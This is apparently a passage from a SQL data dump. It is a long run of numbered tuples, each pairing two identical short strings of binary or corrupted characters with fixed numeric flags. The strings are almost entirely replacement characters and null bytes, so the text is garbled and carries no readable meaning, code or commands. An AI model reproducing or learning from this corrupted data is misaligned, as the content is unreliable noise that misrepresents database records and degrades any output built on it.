(3051,'(E��','(E��',1,0,90,0),
(3052,'��Z�','��Z�',1,0,90,0),
(3053,'g�<�','g�<�',1,0,90,0),
(3054,'k�m','k�m',1,0,90,0),
(3055,'�F^','�F^',1,0,90,0),
(3056,'[���','[���',1,0,90,0),
(3057,'��^','��^',1,0,90,0),
(3058,')ؼ\\',')ؼ\\',1,0,90,0),
(3059,'�cv�','�cv�',1,0,90,0),
(3060,'(E��','(E��',1,0,90,0),
(3061,'�5${','�5${',1,0,90,0),
(3062,'(z֪','(z֪',1,0,90,0),
(3063,'A�i','A�i',1,0,90,0),
(3064,'l��Z','l��Z',1,0,90,0),
(3065,'Ur��','Ur��',1,0,90,0),
(3066,'�;��','�;��',1,0,90,0),
(3067,'��R�','��R�',1,0,90,0),
(3068,'MD[;','MD[;',1,0,90,0),
(3069,'Y&a�','Y&a�',1,0,90,0),
(3070,'���@','���@',1,0,90,0),
(3071,'��:','��:',1,0,90,0),
(3072,'��|','��|',1,0,90,0),
(3073,'>�&�','>�&�',1,0,90,0),
(3074,'����','����',1,0,90,0),
(3075,'-Q\'','-Q\'',1,0,90,0),
(3076,'��ψ','��ψ',1,0,90,0),
(3077,'4��S','4��S',1,0,90,0),
(3078,'�ұ/','�ұ/',1,0,90,0),
(3079,'�A','�A',1,0,90,0),
(3080,'��D�','��D�',1,0,90,0),
(3081,'���','���',1,0,90,0),
(3082,'����','����',1,0,90,0),
(3083,'(zՃ','(zՃ',1,0,90,0),
(3084,'�c �','�c �',1,0,90,0),
(3085,'\rC��','\rC��',1,0,90,0),
(3086,'\rYh','\rYh',1,0,90,0),
(3087,'\rrj','\rrj',1,0,90,0),
(3088,' K���\0\0\0\0\0\0\0',' K���\0\0\0\0\0\0\0',1,0,90,1),
(3089,'��Q�','��Q�',1,0,90,0),
(3090,'\rY>m','\rY>m',1,0,90,0),
(3091,'Oc*�','Oc*�',1,0,90,0),
(3092,'���Q','���Q',1,0,90,0),
(3093,'э:','э:',1,0,90,0),
(3094,'C�:Q','C�:Q',1,0,90,0),
(3095,'��Q�','��Q�',1,0,90,0),
(3096,'\rYG','\rYG',1,0,90,0),
(3097,'k��','k��',1,0,90,0),
(3098,'C�;�','C�;�',1,0,90,0),
(3099,'�� �','�� �',1,0,90,0),
(3100,'(E�B','(E�B',1,0,90,0),
(3101,'(V.�','(V.�',1,0,90,0),
(3102,'k��','k��',1,0,90,0),
(3103,'*� M\0\0\0\0\0\0\0','*� M\0\0\0\0\0\0\0',1,0,90,1),
(3104,'e (]','e (]',1,0,90,0),
(3105,'Y\'k�','Y\'k�',1,0,90,0),
(3106,'�j','�j',1,0,90,0),
(3107,'2t\\b','2t\\b',1,0,90,0),
(3108,'(S>1','(S>1',1,0,90,0),
(3109,'���','���',1,0,90,0),
(3110,'(z��','(z��',1,0,90,0),
(3111,'٠��','٠��',1,0,90,0),
(3112,'��)','��)',1,0,90,0),
(3113,'/K,n','/K,n',1,0,90,0),
(3114,'4���','4���',1,0,90,0),
(3115,'l��Q','l��Q',1,0,90,0),
(3116,'��Ni','��Ni',1,0,90,0),
(3117,'3D�','3D�',1,0,90,0),
(3118,'���','���',1,0,90,0),
(3119,'�@|�','�@|�',1,0,90,0),
(3120,'��k�','��k�',1,0,90,0),
(3121,'$�|','$�|',1,0,90,0),
(3122,'�zx','�zx',1,0,90,0),
(3123,'/kK�','/kK�',1,0,90,0),
(3124,'@4>','@4>',1,0,90,0),
(3125,'vDaz','vDaz',1,0,90,0),
(3126,'��G�','��G�',1,0,90,0),
(3127,'%�5','%�5',1,0,90,0),
(3128,'U��P','U��P',1,0,90,0),
(3129,']��',']��',1,0,90,0),
(3130,'Yt�v','Yt�v',1,0,90,0),
(3131,'h�~','h�~',1,0,90,0),
(3132,'�`�','�`�',1,0,90,0),
(3133,'�&\\e','�&\\e',1,0,90,0),
(3134,'�Y��','�Y��',1,0,90,0),
(3135,'gӡ ','gӡ ',1,0,90,0),
(3136,'� #�','� #�',1,0,90,0),
(3137,'+�K','+�K',1,0,90,0),
(3138,'�AH','�AH',1,0,90,0),
(3139,'��VN','��VN',1,0,90,0),
(3140,'m�q','m�q',1,0,90,0),
(3141,'���','���',1,0,90,0),
(3142,'�;(�','�;(�',1,0,90,0),
(3143,'&\0D3\0{d���*t','&\0D3\0{d���*t',1,0,90,1),
(3144,'4L��','4L��',1,0,90,0),
(3145,'g�2�','g�2�',1,0,90,0),
(3146,'���p','���p',1,0,90,0),
(3147,'�\0�n','�\0�n',1,0,90,0),
(3148,'B7@`','B7@`',1,0,90,0),
(3149,'�A�a','�A�a',1,0,90,0),
(3150,'%�]','%�]',1,0,90,0),
(3151,'B^n�','B^n�',1,0,90,0),
(3152,'\"�i','\"�i',1,0,90,0),
(3153,'�肿','�肿',1,0,90,0),
(3154,'��*','��*',1,0,90,0),
(3155,'��)D','��)D',1,0,90,0),
(3156,'��+�','��+�',1,0,90,0),
(3157,'4�b','4�b',1,0,90,0),
(3158,'�~�k','�~�k',1,0,90,0),
(3159,'Alog','Alog',1,0,90,0),
(3160,'�;��','�;��',1,0,90,0),
(3161,'4�?t','4�?t',1,0,90,0),
(3162,'�\r~','�\r~',1,0,90,0),
(3163,'�7�1','�7�1',1,0,90,0),
(3164,'�\0�\Z','�\0�\Z',1,0,90,0),
(3165,'��(�','��(�',1,0,90,0),
(3166,'l���','l���',1,0,90,0),
(3167,'�z','�z',1,0,90,0),
(3168,'6���','6���',1,0,90,0),
(3169,'Ə�','Ə�',1,0,90,0),
(3170,'g��k','g��k',1,0,90,0),
(3171,'Rߥ\n','Rߥ\n',1,0,90,0),
(3172,'��','��',1,0,90,0),
(3173,'�B�(','�B�(',1,0,90,0),
(3174,'+��v','+��v',1,0,90,0),
(3175,'�G�a','�G�a',1,0,90,0),
(3176,'k�^\r','k�^\r',1,0,90,0),
(3177,'N�\00','N�\00',1,0,90,0),
(3178,'��L\Z','��L\Z',1,0,90,0),
(3179,'�;��','�;��',1,0,90,0),
(3180,'˯','˯',1,0,90,0),
(3181,'�Yh','�Yh',1,0,90,0),
(3182,'*`+ ','*`+ ',1,0,90,0),
(3183,'��!','��!',1,0,90,0),
(3184,'\"�qm','\"�qm',1,0,90,0),
(3185,'��Y','��Y',1,0,90,0),
(3186,'4','4',1,0,90,0),
(3187,'��@','��@',1,0,90,0),
(3188,'�7�j','�7�j',1,0,90,0),
(3189,'��<','��<',1,0,90,0),
(3190,'ë4_','ë4_',1,0,90,0),
(3191,'�>�','�>�',1,0,90,0),
(3192,'��0','��0',1,0,90,0),
(3193,'��#�','��#�',1,0,90,0),
(3194,'X�tS','X�tS',1,0,90,0),
(3195,'g$�','g$�',1,0,90,0),
(3196,'*@\0\0\0�4�}����','*@\0\0\0�4�}����',1,0,90,1),
(3197,'l=��','l=��',1,0,90,0),
(3198,'*Y@�\0\0\0\0\0\0\0\0\0','*Y@�\0\0\0\0\0\0\0\0\0',1,0,90,1),
(3199,'&��\0\0\0\0\0\0\r0','&��\0\0\0\0\0\0\r0',1,0,90,1),
(3200,'3D�','3D�',1,0,90,0),
(3201,'U�X�','U�X�',1,0,90,0),
(3202,'���-','���-',1,0,90,0),
(3203,'�S��','�S��',1,0,90,0),
(3204,'�[D�','�[D�',1,0,90,0),
(3205,'��','��',1,0,90,0),
(3206,',�_',',�_',1,0,90,0),
(3207,'hq?','hq?',1,0,90,0),
(3208,'*~\0\0\0\0\0�<���0\"�','*~\0\0\0\0\0�<���0\"�',1,0,90,1),
(3209,'$u\0��\0Rk����? ','$u\0��\0Rk����? ',1,0,90,1),
(3210,'$��','$��',1,0,90,0),
(3211,'#�a','#�a',1,0,90,0),
(3212,'&��\0�\0\0\0\0�\0','&��\0�\0\0\0\0�\0',1,0,90,1),
(3213,'_�y#','_�y#',1,0,90,0),
(3214,'�c��','�c��',1,0,90,0),
(3215,'h��','h��',1,0,90,0),
(3216,'�L_�','�L_�',1,0,90,0),
(3217,'QX5+','QX5+',1,0,90,0),
(3218,'-L�\n','-L�\n',1,0,90,0),
(3219,'E��J','E��J',1,0,90,0),
(3220,'���','���',1,0,90,0),
(3221,'h켳','h켳',1,0,90,0),
(3222,'��<u','��<u',1,0,90,0),
(3223,'.,pG','.,pG',1,0,90,0),
(3224,'/Y��','/Y��',1,0,90,0),
(3225,'�c0','�c0',1,0,90,0),
(3226,'�kp�','�kp�',1,0,90,0),
(3227,'l=�f','l=�f',1,0,90,0),
(3228,'�>�','�>�',1,0,90,0),
(3229,' A�\0\0\0\0\0\0\0>o',' A�\0\0\0\0\0\0\0>o',1,0,90,1),
(3230,'��Eu','��Eu',1,0,90,0),
(3231,'�贋','�贋',1,0,90,0),
(3232,'g��:','g��:',1,0,90,0),
(3233,'�J&�','�J&�',1,0,90,0),
(3234,'���','���',1,0,90,0),
(3235,'h���','h���',1,0,90,0),
(3236,'&�\0?\0\0\0\0��','&�\0?\0\0\0\0��',1,0,90,1),
(3237,'�#�}','�#�}',1,0,90,0),
(3238,'N.k(','N.k(',1,0,90,0),
(3239,'U��','U��',1,0,90,0),
(3240,'�=�\"','�=�\"',1,0,90,0),
(3241,'���','���',1,0,90,0),
(3242,'nN','nN',1,0,90,0),
(3243,'�Ů8','�Ů8',1,0,90,0),
(3244,'���;','���;',1,0,90,0),
(3245,'4u ','4u ',1,0,90,0),
(3246,'ϚΡ','ϚΡ',1,0,90,0),
(3247,'.�','.�',1,0,90,0),
(3248,'bqNP','bqNP',1,0,90,0),
(3249,'��`�','��`�',1,0,90,0),
(3250,'i7\Z','i7\Z',1,0,90,0),
(3251,'*��\0\0�\0\0\0\0��','*��\0\0�\0\0\0\0��',1,0,90,1),
(3252,'��HH','��HH',1,0,90,0),
(3253,'�=�','�=�',1,0,90,0),
(3254,'*r�\0\0\0\Z��\0#C','*r�\0\0\0\Z��\0#C',1,0,90,1),
(3255,'$���\0�EQ���','$���\0�EQ���',1,0,90,1),
(3256,'#�=','#�=',1,0,90,0),
(3257,'=�|','=�|',1,0,90,0),
(3258,'�ǣ�','�ǣ�',1,0,90,0),
(3259,'��W�','��W�',1,0,90,0),
(3260,'�3�=','�3�=',1,0,90,0),
(3261,'-�L','-�L',1,0,90,0),
(3262,'��;\'','��;\'',1,0,90,0),
(3263,'*�!�\0\0\0\0\0\0\0','*�!�\0\0\0\0\0\0\0',1,0,90,1),
(3264,'/a�','/a�',1,0,90,0),
(3265,'��x2','��x2',1,0,90,0),
(3266,' F\Z',' F\Z',1,0,90,0),
(3267,'\\5`�','\\5`�',1,0,90,0),
(3268,'���0','���0',1,0,90,0),
(3269,'*�\0k\"�\0\0\0\0\0\0\0','*�\0k\"�\0\0\0\0\0\0\0',1,0,90,1),
(3270,'��i�','��i�',1,0,90,0),
(3271,' @\0\0\0\0\0\0\0\0\0Y',' @\0\0\0\0\0\0\0\0\0Y',1,0,90,1),
(3272,',�o�',',�o�',1,0,90,0),
(3273,'���*','���*',1,0,90,0),
(3274,'�\0�(','�\0�(',1,0,90,0),
(3275,'��','��',1,0,90,0),
(3276,'�S�_','�S�_',1,0,90,0),
(3277,'�b�','�b�',1,0,90,0),
(3278,' x�v�\0v\0�',' x�v�\0v\0�',1,0,90,1),
(3279,'��> ','��> ',1,0,90,0),
(3280,'\"� ','\"� ',1,0,90,0),
(3281,' \r�{\0\0\0\0\0\0\0\0',' \r�{\0\0\0\0\0\0\0\0',1,0,90,1),
(3282,'�� \n','�� \n',1,0,90,0),
(3283,'p�v�','p�v�',1,0,90,0),
(3284,')��)',')��)',1,0,90,0),
(3285,'��d','��d',1,0,90,0),
(3286,'�4i�','�4i�',1,0,90,0),
(3287,'+��1','+��1',1,0,90,0),
(3288,'\"�}','\"�}',1,0,90,0),
(3289,'�zhS','�zhS',1,0,90,0),
(3290,'h�CH','h�CH',1,0,90,0),
(3291,'\Z�','\Z�',1,0,90,0),
(3292,'- �B','- �B',1,0,90,0),
(3293,'ԯ�B','ԯ�B',1,0,90,0),
(3294,'�V','�V',1,0,90,0),
(3295,'*Y@�\0\0\0\0\0\0\0\0\0','*Y@�\0\0\0\0\0\0\0\0\0',1,0,90,1),
(3296,'[g��','[g��',1,0,90,0),
(3297,'g�m','g�m',1,0,90,0),
(3298,'F&�','F&�',1,0,90,0),
(3299,'g��','g��',1,0,90,0),
(3300,'n*�g','n*�g',1,0,90,0),
(3301,'*�q@�\0\0\0\0\0\0\0','*�q@�\0\0\0\0\0\0\0',1,0,90,1),
(3302,'���','���',1,0,90,0),
(3303,'�x','�x',1,0,90,0),
(3304,'\\�0_','\\�0_',1,0,90,0),
(3305,'gK�','gK�',1,0,90,0),
(3306,'��%P','��%P',1,0,90,0),
(3307,'g��V','g��V',1,0,90,0),
(3308,'��Jc','��Jc',1,0,90,0),
(3309,'�;�n','�;�n',1,0,90,0),
(3310,'�M�)','�M�)',1,0,90,0),
(3311,'&��\0\0�\0\0\0\0#�','&��\0\0�\0\0\0\0#�',1,0,90,1),
(3312,'Oe+�','Oe+�',1,0,90,0),
(3313,'�','�',1,0,90,0),
(3314,'�=�','�=�',1,0,90,0),
(3315,'4��','4��',1,0,90,0),
(3316,'k�8�','k�8�',1,0,90,0),
(3317,'B�6\'','B�6\'',1,0,90,0),
(3318,' A�\0��\0\0\0\0\0\0\0\0',' A�\0��\0\0\0\0\0\0\0\0',1,0,90,1),
(3319,'$\r\0\Z��\0���R�','$\r\0\Z��\0���R�',1,0,90,1),
(3320,'On>�','On>�',1,0,90,0),
(3321,'g�','g�',1,0,90,0),
(3322,'*�!4r$\0\0\0\0\0\0\0','*�!4r$\0\0\0\0\0\0\0',1,0,90,1),
(3323,'&\0<\0\0\0\0\0�<����1','&\0<\0\0\0\0\0�<����1',1,0,90,1),
(3324,'��Ԡ','��Ԡ',1,0,90,0),
(3325,'g�ږ','g�ږ',1,0,90,0),
(3326,'l=��','l=��',1,0,90,0),
(3327,'�','�',1,0,90,0),
(3328,'�7�/','�7�/',1,0,90,0),
(3329,'��u�','��u�',1,0,90,0),
(3330,'h��4','h��4',1,0,90,0),
(3331,'a','a',1,0,90,0),
(3332,'�c|�','�c|�',1,0,90,0),
(3333,' �D\0|T\0����',' �D\0|T\0����',1,0,90,1),
(3334,'��\Z9','��\Z9',1,0,90,0),
(3335,'Ľq','Ľq',1,0,90,0),
(3336,'�A��','�A��',1,0,90,0),
(3337,'@�P','@�P',1,0,90,0),
(3338,'�J&b','�J&b',1,0,90,0),
(3339,'\r\\�1','\r\\�1',1,0,90,0),
(3340,'O�α','O�α',1,0,90,0),
(3341,'#�M','#�M',1,0,90,0),
(3342,'*G�\0G�\0\0\0\0\0\0\0','*G�\0G�\0\0\0\0\0\0\0',1,0,90,1),
(3343,'��n�','��n�',1,0,90,0),
(3344,'Q�L','Q�L',1,0,90,0),
(3345,'�6r7','�6r7',1,0,90,0),
(3346,'%��}','%��}',1,0,90,0),
(3347,'ge�','ge�',1,0,90,0),
(3348,'��&�','��&�',1,0,90,0),
(3349,'�CiV','�CiV',1,0,90,0),
(3350,'QE��','QE��',1,0,90,0),
(3351,'rsԴ','rsԴ',1,0,90,0),
(3352,'+���','+���',1,0,90,0),
(3353,'\\rb�','\\rb�',1,0,90,0),
(3354,'\"jފ','\"jފ',1,0,90,0),
(3355,'#�1�','#�1�',1,0,90,0),
(3356,'$�x�\0 w �R�/','$�x�\0 w �R�/',1,0,90,1),
(3357,'g$i','g$i',1,0,90,0),
(3358,'C͈u','C͈u',1,0,90,0),
(3359,'B�8b','B�8b',1,0,90,0),
(3360,'U���','U���',1,0,90,0),
(3361,'\\��7','\\��7',1,0,90,0),
(3362,')<B',')<B',1,0,90,0),
(3363,'p�d','p�d',1,0,90,0),
(3364,'[��','[��',1,0,90,0),
(3365,'��vv','��vv',1,0,90,0),
(3366,'3D�','3D�',1,0,90,0),
(3367,'��V�','��V�',1,0,90,0),
(3368,'g) ','g) ',1,0,90,0),
(3369,'&���','&���',1,0,90,0),
(3370,'�D/�','�D/�',1,0,90,0),
(3371,'g�8?','g�8?',1,0,90,0),
(3372,'R�o=','R�o=',1,0,90,0),
(3373,'*@\0\0\0*x�����','*@\0\0\0*x�����',1,0,90,1),
(3374,'D^t�','D^t�',1,0,90,0),
(3375,'����','����',1,0,90,0),
(3376,'ν�','ν�',1,0,90,0),
(3377,'�;��','�;��',1,0,90,0),
(3378,'��5�','��5�',1,0,90,0),
(3379,'�5��','�5��',1,0,90,0),
(3380,'/`L~','/`L~',1,0,90,0),
(3381,'B�8n','B�8n',1,0,90,0),
(3382,'*\0�\0\0\0\0\0\0\0\0\0q','*\0�\0\0\0\0\0\0\0\0\0q',1,0,90,1),
(3383,'��G','��G',1,0,90,0),
(3384,'ՠG~','ՠG~',1,0,90,0),
(3385,'D��m','D��m',1,0,90,0),
(3386,'-?a�','-?a�',1,0,90,0),
(3387,'gyI�','gyI�',1,0,90,0),
(3388,'��','��',1,0,90,0),
(3389,'�a��','�a��',1,0,90,0),
(3390,'��J�','��J�',1,0,90,0),
(3391,'4u�','4u�',1,0,90,0),
(3392,'-Lyn','-Lyn',1,0,90,0),
(3393,'h��s','h��s',1,0,90,0),
(3394,'�F^','�F^',1,0,90,0),
(3395,'1�k�','1�k�',1,0,90,0),
(3396,'�;�','�;�',1,0,90,0),
(3397,'Y�J�','Y�J�',1,0,90,0),
(3398,'D��<','D��<',1,0,90,0),
(3399,'��^','��^',1,0,90,0),
(3400,'gj��','gj��',1,0,90,0),
(3401,'B�8u','B�8u',1,0,90,0),
(3402,'E�l','E�l',1,0,90,0),
(3403,'|+','|+',1,0,90,0),
(3404,'���','���',1,0,90,0),
(3405,'����','����',1,0,90,0),
(3406,'�ת�','�ת�',1,0,90,0),
(3407,'��Z�','��Z�',1,0,90,0),
(3408,'�m�x','�m�x',1,0,90,0),
(3409,'�ƣ�','�ƣ�',1,0,90,0),
(3410,'�6x]','�6x]',1,0,90,0),
(3411,'��ku','��ku',1,0,90,0),
(3412,'&SO�','&SO�',1,0,90,0),
(3413,'�G�','�G�',1,0,90,0),
(3414,'�E��','�E��',1,0,90,0),
(3415,'���','���',1,0,90,0),
(3416,'�ƾ','�ƾ',1,0,90,0),
(3417,'�/H','�/H',1,0,90,0),
(3418,'ǽ{','ǽ{',1,0,90,0),
(3419,'\\� �','\\� �',1,0,90,0),
(3420,'��D','��D',1,0,90,0),
(3421,'�=� ','�=� ',1,0,90,0),
(3422,'���','���',1,0,90,0),
(3423,'q�|b','q�|b',1,0,90,0),
(3424,'�~\"�','�~\"�',1,0,90,0),
(3425,'9��','9��',1,0,90,0),
(3426,'�G�)','�G�)',1,0,90,0),
(3427,'-vڛ','-vڛ',1,0,90,0),
(3428,'Q-��','Q-��',1,0,90,0),
(3429,'Y�h�','Y�h�',1,0,90,0),
(3430,'�B�','�B�',1,0,90,0),
(3431,'�G�','�G�',1,0,90,0),
(3432,'4��','4��',1,0,90,0),
(3433,'\\��','\\��',1,0,90,0),
(3434,'V0�','V0�',1,0,90,0),
(3435,'D��G','D��G',1,0,90,0),
(3436,'�^�5','�^�5',1,0,90,0),
(3437,'�G�B','�G�B',1,0,90,0),
(3438,'�+��','�+��',1,0,90,0),
(3439,'Uu<u','Uu<u',1,0,90,0),
(3440,'h�t','h�t',1,0,90,0),
(3441,'�K��','�K��',1,0,90,0),
(3442,'[Тe','[Тe',1,0,90,0),
(3443,'o}�','o}�',1,0,90,0),
(3444,'�D�2','�D�2',1,0,90,0),
(3445,'�K��','�K��',1,0,90,0),
(3446,'�zxP','�zxP',1,0,90,0),
(3447,'H�!u','H�!u',1,0,90,0),
(3448,'D��:','D��:',1,0,90,0),
(3449,'�4�\'','�4�\'',1,0,90,0),
(3450,'E9�\Z','E9�\Z',1,0,90,0),
(3451,'\\�H','\\�H',1,0,90,0),
(3452,'*8B�=\0M6SD��9','*8B�=\0M6SD��9',1,0,90,1),
(3453,'B�','B�',1,0,90,0),
(3454,'��','��',1,0,90,0),
(3455,'U��Q','U��Q',1,0,90,0),
(3456,'˼��','˼��',1,0,90,0),
(3457,'H�D2','H�D2',1,0,90,0),
(3458,'�M�','�M�',1,0,90,0),
(3459,'»�s','»�s',1,0,90,0),
(3460,'Vj��','Vj��',1,0,90,0),
(3461,'#��','#��',1,0,90,0),
(3462,'�ɴ','�ɴ',1,0,90,0),
(3463,'g���','g���',1,0,90,0),
(3464,'�zX','�zX',1,0,90,0),
(3465,'�G�8','�G�8',1,0,90,0),
(3466,'�E��','�E��',1,0,90,0),
(3467,'D��','D��',1,0,90,0),
(3468,'�uD','�uD',1,0,90,0),
(3469,'��/�','��/�',1,0,90,0),
(3470,'w*�','w*�',1,0,90,0),
(3471,'w*��','w*��',1,0,90,0),
(3472,'Vi C','Vi C',1,0,90,0),
(3473,'3[� ','3[� ',1,0,90,0),
(3474,'�\"��','�\"��',1,0,90,0),
(3475,'�K��','�K��',1,0,90,0),
(3476,'S�Cu','S�Cu',1,0,90,0),
(3477,'����','����',1,0,90,0),
(3478,'6�W�','6�W�',1,0,90,0),
(3479,'�','�',1,0,90,0),
(3480,'}��','}��',1,0,90,0),
(3481,'ْR�','ْR�',1,0,90,0),
(3482,'���','���',1,0,90,0),
(3483,'�$o;','�$o;',1,0,90,0),
(3484,'&\0\0_h2,��V(lb','&\0\0_h2,��V(lb',1,0,90,1),
(3485,'�YC','�YC',1,0,90,0),
(3486,'\"��o','\"��o',1,0,90,0),
(3487,'�\\��','�\\��',1,0,90,0),
(3488,'�K֣','�K֣',1,0,90,0),
(3489,'O�L�','O�L�',1,0,90,0),
(3490,'�~�','�~�',1,0,90,0),
(3491,'Rf�','Rf�',1,0,90,0),
(3492,'D���','D���',1,0,90,0),
(3493,'#K�Q','#K�Q',1,0,90,0),
(3494,'��','��',1,0,90,0),
(3495,'�^|','�^|',1,0,90,0),
(3496,'>f��','>f��',1,0,90,0),
(3497,'�Kݫ','�Kݫ',1,0,90,0),
(3498,'mH�','mH�',1,0,90,0),
(3499,'�2�V','�2�V',1,0,90,0),
(3500,'�\n','�\n',1,0,90,0),
(3501,'�,Nl','�,Nl',1,0,90,0),
(3502,'�K�+','�K�+',1,0,90,0),
(3503,'��','��',1,0,90,0),
(3504,'Y�J�','Y�J�',1,0,90,0),
(3505,'��\'','��\'',1,0,90,0),
(3506,'��G�','��G�',1,0,90,0),
(3507,'��','��',1,0,90,0),
(3508,'\"��','\"��',1,0,90,0),
(3509,'�','�',1,0,90,0),
(3510,'��n','��n',1,0,90,0),
(3511,'3Q�r','3Q�r',1,0,90,0),
(3512,'��','��',1,0,90,0),
(3513,'��','��',1,0,90,0),
(3514,'\\�UF','\\�UF',1,0,90,0),
(3515,'�]!v','�]!v',1,0,90,0),
(3516,'�0�','�0�',1,0,90,0),
(3517,'��߬','��߬',1,0,90,0),
(3518,'}}$','}}$',1,0,90,0),
(3519,'´1�','´1�',1,0,90,0),
(3520,'H\n�*','H\n�*',1,0,90,0),
(3521,'��A�','��A�',1,0,90,0),
(3522,'��l','��l',1,0,90,0),
(3523,'Ÿ��','Ÿ��',1,0,90,0),
(3524,'��a�','��a�',1,0,90,0),
(3525,'��h�','��h�',1,0,90,0),
(3526,'��','��',1,0,90,0),
(3527,'��','��',1,0,90,0),
(3528,'W��q','W��q',1,0,90,0),
(3529,'�Ǖ�','�Ǖ�',1,0,90,0),
(3530,'�M','�M',1,0,90,0),
(3531,'˪G�','˪G�',1,0,90,0),
(3532,'�ǥ�','�ǥ�',1,0,90,0),
(3533,'�c�!','�c�!',1,0,90,0),
(3534,'�','�',1,0,90,0),
(3535,'��#�','��#�',1,0,90,0),
(3536,'k��','k��',1,0,90,0),
(3537,'�{�y','�{�y',1,0,90,0),
(3538,'%���','%���',1,0,90,0),
(3539,'-P��','-P��',1,0,90,0),
(3540,'�Ƿ/','�Ƿ/',1,0,90,0),
(3541,'U-','U-',1,0,90,0),
(3542,'��h�','��h�',1,0,90,0),
(3543,'�h��','�h��',1,0,90,0),
(3544,'g¹2','g¹2',1,0,90,0),
(3545,'-P��','-P��',1,0,90,0),
(3546,'����','����',1,0,90,0),
(3547,'*�E\0\0\0���zZ�2','*�E\0\0\0���zZ�2',1,0,90,1),
(3548,'��a','��a',1,0,90,0),
(3549,'�/J','�/J',1,0,90,0),
(3550,'rl��','rl��',1,0,90,0),
(3551,'����','����',1,0,90,0),
(3552,'�ٴ�','�ٴ�',1,0,90,0),
(3553,']vJ',']vJ',1,0,90,0),
(3554,'l��-','l��-',1,0,90,0),
(3555,'-O,�','-O,�',1,0,90,0),
(3556,'���=','���=',1,0,90,0),
(3557,'T;N','T;N',1,0,90,0),
(3558,'6%�','6%�',1,0,90,0),
(3559,'�N/�','�N/�',1,0,90,0),
(3560,'g�P','g�P',1,0,90,0),
(3561,'hQ ','hQ ',1,0,90,0),
(3562,'-�d','-�d',1,0,90,0),
(3563,'l�K�','l�K�',1,0,90,0),
(3564,'@w�','@w�',1,0,90,0),
(3565,'�ɛ9','�ɛ9',1,0,90,0),
(3566,'6O�','6O�',1,0,90,0),
(3567,'|�','|�',1,0,90,0),
(3568,'k��r','k��r',1,0,90,0),
(3569,'6\'Da','6\'Da',1,0,90,0),
(3570,'�Ez�','�Ez�',1,0,90,0),
(3571,'6[��','6[��',1,0,90,0),
(3572,'\r��','\r��',1,0,90,0),
(3573,'.e�','.e�',1,0,90,0),
(3574,'�C��','�C��',1,0,90,0),
(3575,'�E��','�E��',1,0,90,0),
(3576,'_��','_��',1,0,90,0),
(3577,'��{�','��{�',1,0,90,0),
(3578,'\"K�','\"K�',1,0,90,0),
(3579,'�G�','�G�',1,0,90,0),
(3580,'U��','U��',1,0,90,0),
(3581,'U��','U��',1,0,90,0),
(3582,'�@��','�@��',1,0,90,0),
(3583,'��b','��b',1,0,90,0),
(3584,'��`','��`',1,0,90,0),
(3585,'��_','��_',1,0,90,0),
(3586,'\"��','\"��',1,0,90,0),
(3587,'�q�i','�q�i',1,0,90,0),
(3588,'&3V','&3V',1,0,90,0),
(3589,'g��','g��',1,0,90,0),
(3590,'��~e','��~e',1,0,90,0),
(3591,'���','���',1,0,90,0),
(3592,'�#X[','�#X[',1,0,90,0),
(3593,'M^��','M^��',1,0,90,0),
(3594,'*� Fv&\0\0\0\0\0\0\0','*� Fv&\0\0\0\0\0\0\0',1,0,90,1),
(3595,'�\ZzP','�\ZzP',1,0,90,0),
(3596,'>�\0�','>�\0�',1,0,90,0),
(3597,'q�@�','q�@�',1,0,90,0),
(3598,'g�j{','g�j{',1,0,90,0),
(3599,' Ax\0\0b3\0�',' Ax\0\0b3\0�',1,0,90,1),
(3600,'g�','g�',1,0,90,0),
(3601,'��','��',1,0,90,0),
(3602,'��a','��a',1,0,90,0),
(3603,'���','���',1,0,90,0),
(3604,'&��','&��',1,0,90,0),
(3605,'�Q�','�Q�',1,0,90,0),
(3606,'_���','_���',1,0,90,0),
(3607,'�y=�','�y=�',1,0,90,0),
(3608,'*� `vD\0\0\0\0\0\0\0','*� `vD\0\0\0\0\0\0\0',1,0,90,1),
(3609,'P�','P�',1,0,90,0),
(3610,'R�','R�',1,0,90,0),
(3611,',Ȍ',',Ȍ',1,0,90,0),
(3612,'>t�V','>t�V',1,0,90,0),
(3613,'�ZK3','�ZK3',1,0,90,0),
(3614,'�a�c','�a�c',1,0,90,0),
(3615,'\"�_z','\"�_z',1,0,90,0),
(3616,'Pӱ�','Pӱ�',1,0,90,0),
(3617,'�Uю','�Uю',1,0,90,0),
(3618,'}�\\','}�\\',1,0,90,0),
(3619,'/Y1�','/Y1�',1,0,90,0),
(3620,'�Qt�','�Qt�',1,0,90,0),
(3621,'&��b','&��b',1,0,90,0),
(3622,'�cq','�cq',1,0,90,0),
(3623,'��ݱ','��ݱ',1,0,90,0),
(3624,'�q��','�q��',1,0,90,0),
(3625,'Xc��','Xc��',1,0,90,0),
(3626,'4�b�','4�b�',1,0,90,0),
(3627,'g�L','g�L',1,0,90,0),
(3628,';�',';�',1,0,90,0),
(3629,'6��','6��',1,0,90,0),
(3630,'�Z�','�Z�',1,0,90,0),
(3631,'νP�','νP�',1,0,90,0),
(3632,'�6X!','�6X!',1,0,90,0),
(3633,'+�x','+�x',1,0,90,0),
(3634,'�]�E','�]�E',1,0,90,0),
(3635,'B�8\\','B�8\\',1,0,90,0),
(3636,'#�H�','#�H�',1,0,90,0),
(3637,'���:','���:',1,0,90,0),
(3638,'#�:','#�:',1,0,90,0),
(3639,'g\'�','g\'�',1,0,90,0),
(3640,'4��','4��',1,0,90,0),
(3641,'�Y�','�Y�',1,0,90,0),
(3642,'�L��','�L��',1,0,90,0),
(3643,'$\0a�\0\0\0�\0\0\0\0�','$\0a�\0\0\0�\0\0\0\0�',1,0,90,1),
(3644,'�G��','�G��',1,0,90,0),
(3645,'�߯q','�߯q',1,0,90,0),
(3646,'�7�\\','�7�\\',1,0,90,0),
(3647,'Kw�','Kw�',1,0,90,0),
(3648,'��W','��W',1,0,90,0),
(3649,'£��','£��',1,0,90,0),
(3650,'&��\0\0\0\0\0�%|h','&��\0\0\0\0\0�%|h',1,0,90,1),
(3651,'�%�','�%�',1,0,90,0),
(3652,'#�D','#�D',1,0,90,0),
(3653,'�=��','�=��',1,0,90,0),
(3654,'X�d�','X�d�',1,0,90,0),
(3655,'\"I?Q','\"I?Q',1,0,90,0),
(3656,'��v�','��v�',1,0,90,0),
(3657,'*� UXS\0\0\0\0\0\0\0','*� UXS\0\0\0\0\0\0\0',1,0,90,1),
(3658,'&\0<\0\0\0\0�<����e','&\0<\0\0\0\0�<����e',1,0,90,1),
(3659,'�q�j','�q�j',1,0,90,0),
(3660,'>�|l','>�|l',1,0,90,0),
(3661,'(\0�\0\0\0\0\0\0\0\0\0�','(\0�\0\0\0\0\0\0\0\0\0�',1,0,90,1),
(3662,'�av','�av',1,0,90,0),
